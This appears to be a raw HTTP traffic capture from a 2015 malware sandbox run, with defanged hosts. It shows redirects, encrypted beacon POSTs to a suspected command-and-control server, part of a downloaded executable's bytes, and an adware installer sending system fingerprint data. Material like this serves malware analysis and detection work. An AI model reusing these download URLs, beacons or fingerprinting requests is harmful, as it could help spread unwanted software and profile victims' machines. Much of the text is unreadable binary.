keep-alive..0...0...........0...*.H........0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.110/..U...(Go Daddy Root Certificate Authority - G20...090901000000Z..371231235959Z0..1.0...U....US1.0...U....Ari
<<< skipped >>>
GET /8Hk4o HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.nowtake.me
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Server: nginx/1.0.15
Date: Thu, 30 Apr 2015 23:07:42 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: hXXp://VVV.4threquest.me/010914s/010914i.htm
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Credentials: true
<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.0.15</center>..</body>..</html>..HTTP/1.1 301 Moved Permanently..Server: nginx/1.0.15..Date: Thu, 30 Apr 2015 23:07:42 GMT..Content-Type: text/html..Content-Length: 185..Connection: keep-alive..Location: hXXp://VVV.4threquest.me/010914s/010914i.htm..Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Requested-With..Access-Control-Allow-Credentials: true..<html>..<head><title>301 Moved Permanently</title></head>..<body bgcolor="white">..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx/1.0.15</center>..</body>..</html>....
POST /?pcrc=236440515&v=2.0 HTTP/1.1
Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 864
Cache-Control: no-cache
...3E.Q)_l.y...K8....r.=4p.........OL..6_/r.......5.......n(..M.O..E.#.. .X....1...S.A.....A...v.r.o.*.DZ.7.....R..{WxI...].38<..RXG.\].^.. A.. ..(...w.g:.OW..>[.!....m..2.... .....m.........mBdhl)...F"!F_.. .=...]W...r..u......P.l...V..ur...]...3.*.k.j8u.."F..9.3z...L.$*m.h$.@.1...f.)...|... .if/ ..../..5.......6{...........(..!...3%"..&ma.)a.E&'...|...Zm.tb.. {...0..F..l.*..Ax..>3)..`8!......o..
....:b=%....<...(..I.z..........5.{...A.Y[4*....Eg.h,S.o.
.~B.^8.?.T..vD.P.t"...I...l.D?J......a*.t.uS.p.R...>#......1t..TO.0.b..}... p`...L...1{jq|pZ..i...W....q..$).0...,......U.=.......5Pas....2oj...I..`..>...../9.x.|;..%
.#E....-.Cn...k..2H..8D..TW...].1..M.xD...0.:...:.....b..2...Y..8.xG..L.g hT7.-(.oa<.....Kc...#..8M.2._...Vq]G|#Z........\..........}..e.s...I.[}.... ....0.:..l........L....a.}.%5..0..o..d
.J.....ij..*.'.....d@D9...xV...r........
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:06 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONEHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Date: Thu, 30 Apr 2015 23:07:06 GMT..Server: TornadoServer/4.0.2..Content-Length: 4..Connection: keep-alive..DONE....
POST /?pcrc=1901405883&v=2.0 HTTP/1.1
Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 1200
Cache-Control: no-cache
.I..~...$$.........n..Z.Z........(.z ..9...L
..a...L8{..sq."?m..vY.U...I.w.....#}..@.J$.'..3. .W3.}......i.F.;Dgix.i}..U~...]P{.....-..<..&...&...J.".0I.9.Dtl....1......f..._..EO. .G....G.F..G.L.4U..uL..9..I...s.gj.n.TY........{.u..;..(\.D..q/..4I'..
....J...Vv\.i_...Z......H....3....&s.X;..$B...@....6.N......L.f.E.d../....>........X#x..Z...RmF5u..R.=....3.>....[..a.*{...|..`....g.....)b8.m..jUJ.5.t..D.8...".....`......N.>..{.1]6V......'.U......H...m._...<......:..b.^ju.........
/....wT...L....`...0.[.y1.....X.g......I....6......(?~?i`...e..@.TS..;|......O`z.....B.P...@....6...W\_...W..v.5..iV3...R.ku.._.....L.F....u#..]o.:>-..H...v........>N..|.i0..A<0]BT..B.....g........Y..s.m.....P........s......e.....$.nx.........M~..U,........`.P..:<..Q...U..8...'...?.P..0@..U\.C..K....D3-l.3a[.....o....zft.Tu5$i3........m.l..S#i^T<....>......... .{G..7<....y....N..E..|..G.e\........2.O'c..
......z...i..?UH....A5y.....O#Q~....%..*T.Z...&....z...:n.KH..-.m.`.%.~...6...f.(u..@.=......?.x"..k......!..h.e(!6;Q........}...*.E.......o.y.C.|..Z.x..k TbJF.
Od.....5.....sP.....B@...S.].,A....G.Li...G.J.,(.\.) ..o.A.\....n..^..)\.\..(hXq>{..#p...HiZ..H&..../.Z.L.Bcv1.^..:.....1....I}4..~.
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:06 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONEHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Date: Thu, 30 Apr 2015 23:07:06 GMT..Server: TornadoServer/4.0.2..Content-Length: 4..Connection: keep-alive..DONE....
POST /?pcrc=718955205&v=2.0 HTTP/1.1
Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 672
Cache-Control: no-cache
...4.....>.K..~. m].\..1.I...,*R.C.V....E..4A..1....!6..S<.*.W.~j.ofC~"..!.X...^.n.o..5g.]oG46IZ.....Kt.R_nL.....^T.q....R...........c.6h........gA3......,......f...a..>.i..M..[.....m.e..jF.z^..............;^.h....Z.....J....qCn.i.......w...U.T..".:%c.........S.H..}..g.a.A.I.0..%...S0....A3.....r.....X..... ....<..U..I....`......m...k.[M.k~ u..W.|.N...y......b[%.a..<8...\..R..{..%._.?....NR.....%.f#.j...b.L....w.F...TaG.....L7.w\..F..3.Ao.*.X7L.yodeh.N......8.8T.L..r....g }...[..........ya.....U@/]5.ZI.?..d..*2jQ..s.8U.!...e.<C2. r]`.,&Ix.<..lE....!4...;...o.3.M.....q.G}.Qe.h...J..!...(X.~,.....|..lE..d..J.4R.|..U<w.....Y..=n..H.c2....*..gq..{...P%...
(k...
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:08 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONE....
POST /?pcrc=629602451&v=2.0 HTTP/1.1
Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 672
Cache-Control: no-cache
.I..G.)E..,(D-....../3.gA...#A.j..N..-bD$. ..V$. ..21......<a(.>%u...5.L.CV.. ]......../...6{m(W#.#..6...~.{\.!...V._......%...&.%.E.z8H..-.....*..T. ...*..x...rB[...?.CF.......
...........k}./..(.J .....4....[..kp..I..N..*....ob1".7.`.8o........IY.@........,..=s
k..R=.)A.....5..~b80......`
.%."S........=|...x...sJJ;..cA*.q.`.........>.....l...n..=.{w?.W..ni3.m*.h:..4..*Q-.;.u.....i..7
.....c_....-m...*.W..J.,..}O..X.7$k0.B..>\.9..g....~ub..pbWE...t.9.Md......hC#..L4..e...J...u.Yy.[....M.,..>U....B.`..sZz.Qw#.7.. ..^.4..y.R...d..z..@*.s.3>........r.:1.o...\.^.s.aD.}.............ah.....g.FKmr.[.......!(.p....8*......L..Y.F.............J1.[q.n"0[.... ........
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:08 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONE....
POST /?pcrc=688063635&v=2.0 HTTP/1.1
Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 672
Cache-Control: no-cache
I'.........a.o.~`NH...W.5..............3.A.I.....r..&U(#b..6--5.J'V8V.c....3.P......?.p..G...QqF.......;........PF .xA.3...t....T...j...... .:c. ...J...>W~.c....c....z}2...P.{.g...'.....liA.....\.ez.~..fz.....V.W.Q.L|..{...2mP....2u..."(N.7.7t...`X.0...-T8...... .M@.eL.....D....{...d.....Td.0c.o..'........-.8.Q.m*...-3\....g/W..#J....~.:Q.<R..{.y.#..~d.f0.\..F...z..V...$a......
B.?.........8u.8Xz...v7.y...W
\......'...<?C .M9{Q..6...k^i.H{Fs#..J.u.k..7.h..yvW..........*H..dy.._.p..p.;.L.@..&.^.ba...e.........V..6 n.w.V.....|c.tYW*
.......x-[...].b.. -xe@d...<..<..)...?Q..98......(.._M7..,.).I..0[.<u...3a>]....H..s:.g.]/...`..B.....RA.I.2.....Q[d...........
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:08 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONEHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Date: Thu, 30 Apr 2015 23:07:08 GMT..Server: TornadoServer/4.0.2..Content-Length: 4..Connection: keep-alive..DONE....
POST /?pcrc=216881437&v=2.0 HTTP/1.1
Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 2352
Cache-Control: no-cache
W..$...1.:.A].PP.E.......FL .........
..P....?...`..u.....p.gE.d{B.S.VB.z...W..1.hU....&.:......4....K.....E....f.Z2d...}..........';....!.Et....Cr.g....B..@.D..^T,.n$T....d..i.....QQ..
n9/....c....5.i...M.:$.!. :&.........#/.u.S.^.D#/3..`Y.*. .q.OU.....5....@.......5..BvoB....fid.@-I.E.!..S.*)..q:....i..,_#.pp.iER[#.J...__.9......3.....3.q....(.....W.ilN.......6..~./..|..[yv=p.G.D.y.r.9.8.Go.[4.L;.tp.>|.o.....=.<C..E8../O......D8....@.W`.....5>[H..}.C.fpV..c[...1.......p......z..FY W6...eb.2].7D.X....'.m.!.Gs...{f...l]..........e4o.(l...Z.Y....}..e.c.......?.//..K.x.......C.o.2.H.Y...!0...w....rc........iP.$..&..Ii@.I.e..p
..l..i.Da:]........(.O........../..s.".........T^.ux.T........nc(m...E.....U.HL.....|F.s.&.?...*..../.'.v..4...Vm....F..m1..!...%...%...S.P-../Xh@.e..% .F.@w..2.2.......A...C%?B.O.....&..Y...l
...9.AF*.W..O..../..O.F.20.k..v.7..|...2.D.U"!{T$...4:Cq ..A.Z.M...e..}^g.......vC...v.........Z.....!.....2u...f.l.......K@......#6L
...s..8.:.a.c.V.........r]M.'..@.S.....I.....7.I.."...Jh...N.O.U...i...ET......IB..A.....}.X.C8..W.AQ..a......5.-4........V..@.s......(...\.w
....w...A:...p..gfN2,..8/.g4..."..0.m[....Jsb....{.w. ...K....F....:X..c...!.{pI.....b..y&.p..m...9..r....n..&..IB.$f..N...'..../...v.K......_#.?kY5.X.m..a.)).....}.,..s....M.....w.....<W ...4h.T......pZ....=Y...S.g
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:30 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONE....
POST /?pcrc=1431802907&v=2.0 HTTP/1.1
Accept: */*
Host: rp.beyabir.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Content-Length: 2256
Cache-Control: no-cache
...QzK....i.......$.. ..rg..9.O[..cDU.1P4.~Wl....`...@RV..6...L.~...^;.e.>....>A..4....^....^l....)..~........7........t.[..[.....17.........T..\.J..0Z.gB.......z.u..H...}Dc.......'7.>.%..J......V=:7.......z.2..0..........l.......P.o.......[..... .8F...%........Z*...H.`N..c:../....'. ...$..,....s.S.SzX....>..X..@.'...!V......,d....c.>.
...?V...q.P..\.............M..y../U..E......<...5....B..x...=......4_q.u.5..&.f".9.xF....J_.L.N7.Y.].
.Q..W.}N..ez.2...f_.O..\...v.c.*.....L{{l....{."g.1v.m._.....k.W2|(.|.Y...a5)D..6...;..$..7..-...... ....P..`.F....I.ZS....A`C[...o"..b4.&..h..'t.o .3.6...A.90L.*...N`...5....2...Z.
U#.(d..e.S.z..p.6..9.D.)^5....i...yO.......{.HD.....d.s.{.....~Q.)....D...~..."..[.[(.....|..q...R4..Z..p.......?..'...
[....p..V...f....p ..u........uf.e)H~.d9.m..8......AIkKc...83.yr>......P.
x{..#.j....^f.A$..-.._.hxKxb..P_.........T*.?.)..C..[..6u.)...ml..46:..y..W....K.y.D60.yS *...$..M.&.......=..&..n.hz......&..odA.A"...(9..,..W..C|..3vT.'...3v..n.}....U."..fE.?.c.&..ZE?6t$.z..8(.p..x&N.C...;'.cK..YHob.....CHw...'..*aY....(.....H......".c%"...zD..ko.j&..4
M........
)..}..Kq...K..Q../}p..1.[qM[V.....o:].TB.&_...../..>.X.t...}.^F$J..W.9.
1|N%U..k.L.^C..N.r.(.%|B.O....[..i...)S...RO.....,7.-..."]...$.~.l......q#%..s$......`.~..x.x~...mku.1..U:............^...*...@.&D.
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:30 GMT
Server: TornadoServer/4.0.2
Content-Length: 4
Connection: keep-alive
DONEHTTP/1.1 200 OK..Content-Type: text/html; charset=UTF-8..Date: Thu, 30 Apr 2015 23:07:30 GMT..Server: TornadoServer/4.0.2..Content-Length: 4..Connection: keep-alive..DONE..
GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSpuCE3aK3GivZPzGQJ6L5BRyZofwQUl9BrqCZwyKE/lB8ILcQ1m6ShHvICEEES5jLHsYoCmjofrIA6uJ8= HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.verisign.com
HTTP/1.1 200 OK
Server: nginx/1.4.7
Content-Type: application/ocsp-response
Content-Length: 1790
content-transfer-encoding: binary
Cache-Control: max-age=489793, public, no-transform, must-revalidate
Last-Modified: Wed, 29 Apr 2015 15:15:07 GMT
Expires: Wed, 6 May 2015 15:15:07 GMT
Date: Thu, 30 Apr 2015 23:12:18 GMT
Connection: keep-alive
0..........0..... .....0......0...0......'.V.8.F.V....H....JW..20150429151507Z0s0q0I0... ..........!7h....O.d...AG&h.....k.&p..?...-.5.......A..2.....:...:......20150429151507Z....20150506151507Z0...*.H.............M...2..s..7...........rh.O..2Q........Vn...09..e]..D$.u...r3...x....T.#...................3.X.."mn.w...@..J..H".)=..d.3...SZK...bH.PD..I..9Js.H).2I.....l^|\.?$_7;E......y...ff...}^9...1....}.....fc..:.............T...1;'.o..V.e.=.b*tX[.,..M.H..O7..!.%.A..,...#0...0...0..........r..?.*......y"..0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at https://VVV.verisign.com/rpa (c)09100...U...'VeriSign Class 3 Code Signing 2009-2 CA0...150226000000Z..150527235959Z0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at hXXps://VVV.verisign.com/rpa (c)091<0:..U...3VeriSign Class 3 Code Signing 2009-2 OCSP Responder0.."0...*.H.............0.............m5*R........2....>...yU4..L.. ...........u..Hez..Pn.....d...nz(...V7.}^...d!RX...bl..[..a...L.. .~..Ij......%..%p.-...u..:..i..F*]...*....{NH..|0...gHX.Q.r....S..........._.9.(w...suC...N..s.....&."...:.C.Q.i~rl..<..krS..8.B..o].y..L.4...iB@..s.....mw.........0...0...U....0.0....U. ...0..0....`.H...E....0..0(.. .........hXXps://VVV.verisign.com/CPS0b.. .......0V0...VeriSign, Inc.0.....=VeriSign's CPS incorp. by reference liab. ltd. (c)97 VeriSign0...U.%..0... .......0...U........0... .....0......0"..U....0...0.1.0...U....TGV-B-32010...*.H......
<<< skipped >>>
GET /v4/searchprotect/535559167_198339_B48A115F?action=visit.heartbeat.pcm&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,4.0.1.2253 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 30 Apr 2015 23:07:40 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"1.59 ms","message":"store 2 action and 4 update "}..0..HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 30 Apr 2015 23:07:40 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..48..{"stats":"ok","time":"1.59 ms","message":"store 2 action and 4 update "}..0..
GET //MEkwRzBFMEMwQTAJBgUrDgMCGgUABBS2CA1fbGt26xPkOKX4ZguoUjM0TgQUQMK9J47MNIMwojPX+2yz8LQsgM4CCEMMb3zC402/ HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: ocsp.godaddy.com
HTTP/1.1 200 OK
Date: Thu, 30 Apr 2015 23:12:18 GMT
Server: Apache
Content-Transfer-Encoding: Binary
Cache-Control: max-age=119989, public, no-transform, must-revalidate
Last-Modified: Thu, 30 Apr 2015 22:17:23 GMT
Expires: Sat, 02 May 2015 10:17:23 GMT
ETag: "c0773ca97a9364f110e8a1925adda329f5e6c722"
Content-Length: 1787
Connection: close
Content-Type: application/ocsp-response
0..........0..... .....0......0...0...z0x1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Validation Authority - G2..20150430221723Z0k0i0A0... ..........._lkv...8..f..R34N..@..'..4.0.3..l...,....C.o|..M.....20150430221723Z....20150502101723Z0...*.H.............q.........E.##J.$E,G..0 .......r..)5..L...[>..G..@...f..H..Nz^....K.W'...E.W.=Uws..S.,.....%|.C.....S.3.D.D..L...*...8...]...m...K;<...L.qr^..!..1...iRo.L...p............l...y[...dF...66,s....z..)...!.W..E.f.@.....^M&.G..Sx....a..)u..VIbz...9..h-.....h.!."....0...0...0..........,.z.Hl..0...*.H........0..1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy.com, Inc.1-0 ..U...$hXXp://certs.godaddy.com/repository/1301..U...*Go Daddy Secure Certificate Authority - G20...150316070000Z..160316070000Z0x1.0...U....US1.0...U....Arizona1.0...U....Scottsdale1.0...U....GoDaddy Inc.1 0)..U..."Go Daddy Validation Authority - G20.."0...*.H.............0.........xo(....QQ.`L.~...&...a.F.=.....d=....."......?...\..........b.D....l=.HS.N......A..;....C)...(..T........XA-N....k1 .....ag...,4.L{.I..hEKb..K......!.(...7....p.O...X.._........8.B..k[4...........e.../....^.S..7A.b.oB..\......2%.|c...A....Fk.T..24.0B...p..........0...0...U.......0.0...U...........0...U.%..0... ......... .......0...U.......O........f...e..r..0... .....0......0L..U...E0C0A.?.=.;hXXp://crl.godaddy.com/repository/mastergodaddy2issuing.crl0J..U. .C0A0?..`.H...m....000... ........"hXXp://crl.godaddy.com/repository/0...*.H............
<<< skipped >>>
POST /tdownload.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 106
Host: VVV.lawfuldownload.com
version=1.1.2.41&s1=5844fe1867a9e3700b6c2f6fc517337ccbd4629e&t1=1430435409&campid=9664&prefix=amisetup2899
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Target-FN
Content-Disposition: attachment; filename="amisetup2899__9664.exe"
Content-Type: application/x-msdownload
Date: Thu, 30 Apr 2015 23:07:10 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
X-Target-FN: amisetup2899__9664.exe
Content-Length: 870912
Connection: keep-alive
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................'.......&.......'...............................".....................Rich....................PE..L.....@U.................F...................`....2..........................@,.................................................P.... .. ;...................`.......................................................`..P............................text....E.......F.................. ..`.rdata..\....`.......J..............@..@.data...$...........................@....rsrc... ;... ...<..................@..@.reloc.......`..."...(..............@..B........................................................................................................................................................................................................................................................................................................................................U..j.h.@4.d.....P.P.5.3.P.E.d......E........@......E......M.d......Y..].........U..j.hX<4.d.....PV.P.5.3.P.E.d......u..E.........t.P...............F.....V...........M.d......Y^..].............U..j.h(<4.d.....PV.P.5.3.P.E.d......u..E.........t.P...............F......M.d......Y^..]...............@............t.P.f.............F.........U...E...~.%.........]...........U..j.h.;4.d.....PQV.P.5.3.P.E.d......u..E.P...E......C....E.........4..E........M.d......Y^..]..................U..j.h.;4.d.....PQ.P.5.
<<< skipped >>>
POST /index.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.amoninst.com
Content-Length: 333
Connection: Keep-Alive
Cache-Control: no-cache
Net1.1=&Net2=3.5.30729.5420SP1&Net4=4.0.30319&OSversion=NT6.1SP1&Slv=&Sysid=915A4028688142931B5DDA64A4540CAD&Sysid1=066389C9740F80692FC30C6511692204&X64=Y&admin=Y&browser=IE.HTTP&cavp=&chver=35.0.1916.153&ci=9664&exe=amisetup2899__9664&ffver=29.0.1.5239&i=MyBestOffersTodayBR&lang_DfltUser=0409&netfs=3&s=Y&ts=1430435233&ver=1.1.2.41
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Apr 2015 23:07:14 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
transfer-encoding: chunked
Connection: keep-alive
15d1.... .. ..<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">..<html>..<head>..<meta http-equiv="content-type" content="text/html; charset=UTF-8" /> ..<title>Installer</title>..<base href="hXXp://VVV.amoninst.com:80/index.php" />..<script type="text/javascript" src="hXXp://cdn1.lawfuldownload.com/V19/amipb.js"></script>..<script type="text/javascript">..var g_amiobj = '', g_ami, g_updb = false, g_close = '0', g_additional_offer_list = '0';..var g_finish_install_button = '0';..var g_popup_install_all = '0';..var g_eula = ''; ..var g_post1 = '_hdn=1&_ver=1.1.2.41&_p=1&_s=0&_cc=UA&_cid=9664&_psb=0&_cnt=da721c907b6c24eb05606fcf5cf1c485&_instid=&_brw=ie&_fc=0&_appname=&_appimageurl=&_netfs=-31&_vert=3';..var g_icon = '';..var g_comps = [], g_pages = [], c, g_curPage = -1;..var g_cid = '9664';..var g_tid = '';..var g_cc = 'UA';..var g_lang = 'en';..var g_ip = '193.138.244.231';..var g_browser = 'ie';..var g_cnt = '3e5a8f2a30ab988ef7a611138130e98a';..var g_ver = '1.1.2.41';..var g_buttonImage = 1;..var g_thanks = 'thankyou.php';..var g_images = [];..var g_purl = 'hXXp://VVV.amoninst.com:80/pix.php';..var g_skipCats = 0;..var g_ieVer = '7.0';..var g_chVer = '35.0.1916.153';..var g_ffVer = '29.0.1.5239';..var g_netfs = -31;..var g_vert = 3;..var g_os = "NT6.1SP1";..var g_current_screen = '';..var g_custom_next_button_event = '0';..var g_custom_next_button = '0';..var g_install_all = 0;....function InitInstall()..{.. g_ami.AddThank
<<< skipped >>>
POST /finalize.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: hXXp://VVV.amoninst.com/index.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C)
Host: VVV.amoninst.com
Content-Length: 229
Connection: Keep-Alive
Cache-Control: no-cache
_hdn=1&_ver=1.1.2.41&_p=1&_s=0&_cc=UA&_cid=9664&_psb=0&_cnt=da721c907b6c24eb05606fcf5cf1c485&_instid=&_brw=ie&_fc=0&_appname=&_appimageurl=&_netfs=-31&_vert=3&r_updater=0&r_MyBestOffersTodayBR=0.01&updater=3&MyBestOffersTodayBR=2
HTTP/1.1 200 OK
Content-Type: text/xml
Date: Thu, 30 Apr 2015 23:07:14 GMT
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
Content-Length: 2409
Connection: keep-alive
....<Array><page><f>1</f><fb>1</fb><pt>0</pt><cats>0</cats><updh>1</updh><wrn></wrn><comps></comps><must_show>0</must_show><bdy>PGRpdiBjbGFzcz0iY2xhc3MtMWxpbmVyIj48ZGl2IGNsYXNzPSJjaGVjay1ob2xkZXIiPjxkaXYgY2xhc3M9ImNsYXNzLWNoZWNrLTEiIGlkPSJhbWlfY2hlY2tfTXlCZXN0T2ZmZXJzVG9kYXlCUiIgb25jbGljaz0iQW1pQ2hlY2tDdHJsQ2xpY2tlZCgpIj4NCiAgICAgICAgICAgICAgICAgICAgICAgICA8aW5wdXQgaWQ9ImlfYW1pX015QmVzdE9mZmVyc1RvZGF5QlIiIG5hbWU9Ik15IEJlc3QgT2ZmZXJzIFRvZGF5IiB0eXBlPSJoaWRkZW4iIHZhbHVlPSIxIiAvPjwvZGl2PjxkaXYgY2xhc3M9ImNsYXNzLWxpbmUxIj48c3Bhbj5UT0RPUyBPUyBESUFTIFVNQSBPRkVSVEEhPC9zcGFuPjwvZGl2PjwvZGl2PjxkaXYgY2xhc3M9ImNsYXNzLWxpbmUyIj48c3Bhbj5CeSBDbGlja2luZyAiTmV4dCIgb3IgIkluc3RhbGwiLCBJIGFncmVlIHRvIHRoZSA8YSBocmVmPSJodHRwOi8vZ29vLmdsL25pMm1yZSIgdGFyZ2V0PSJfYmxhbmsiPlRlcm1zIG9mIFNlcnZpY2U8L2E IGFuZCA8YSBocmVmPSJodHRwOi8vZ29vLmdsL1NIcDhSZyIgdGFyZ2V0PSJfYmxhbmsiPlByaXZhY3kgUG9saWN5PC9hPiBhbmQgY29uc2VudCB0byBpbnN0YWxsIE15IEJlc3QgT2ZmZXJzIFRvZGF5Ljwvc3Bhbj48L2Rpdj48L2Rpdj48aW5wdXQgdHlwZT0iaGlkZGVuIiB2YWx1ZT0iMSIgaWQ9ImlfYW1pX3VwZGF0ZXIiLz48aW5wdXQgdHlwZT0iaGlkZGVuIiB2YWx1ZT0idXBkYXRlcixNeUJlc3RPZmZlcnNUb2RheUJSIiBpZD0iYWxsX3Nob3J0X25hbWVzIi8 </bdy><img>__empty__</img></page><page><f>1</f><fb>0</fb><pt>1</pt><cats>0</cats><updh>1</updh><wrn></wrn><comps></comps><must_show>0</must_show><bdy>DQo8
<<< skipped >>>
GET /fp?alpha=A0E1QRo8DxMHXnc7GmsVAgVmTBoDHSMwWyRAZFVFRRE7FQkVajgxdXQFKDU/K0o1FmJxKl9DW2labB4MAwlIMG1tQHQoG1AVK0NZPBgXIntcXC4VWxdFfT8ScCc3AQYME2xKHVc4Mz59AwYsR1ZcUTUcZwA2U0NcAkZkHQ4QRgofYQs+MAxeBwAmQl97FVMnGFEMMwBBRFQxNQpwLicFUxhBYEccUi00N2QHCjkVSU8ENwQ0VycPQU5NGml9VFlBFxgkfSciDkQMQn8bGCYUAD9kJSklQgRBSWI9G3QvMQMEE0EqCxIxZGtjK0ZAOTMeCQJuQDNBWRdAURxDYx82EFEMGDhgMndVHFZpJkJSDklEXgVHKDYRW2RNYzkHdC8xCnQHY24layI/aEQOXW8YcQ== HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: install.plainsavingscenter.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/plain
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
SVR: SP001C2
X-Powered-By: ASP.NET
p3p: CP="CAO PSA OUR"
Date: Thu, 30 Apr 2015 23:07:14 GMT
Content-Length: 0
....
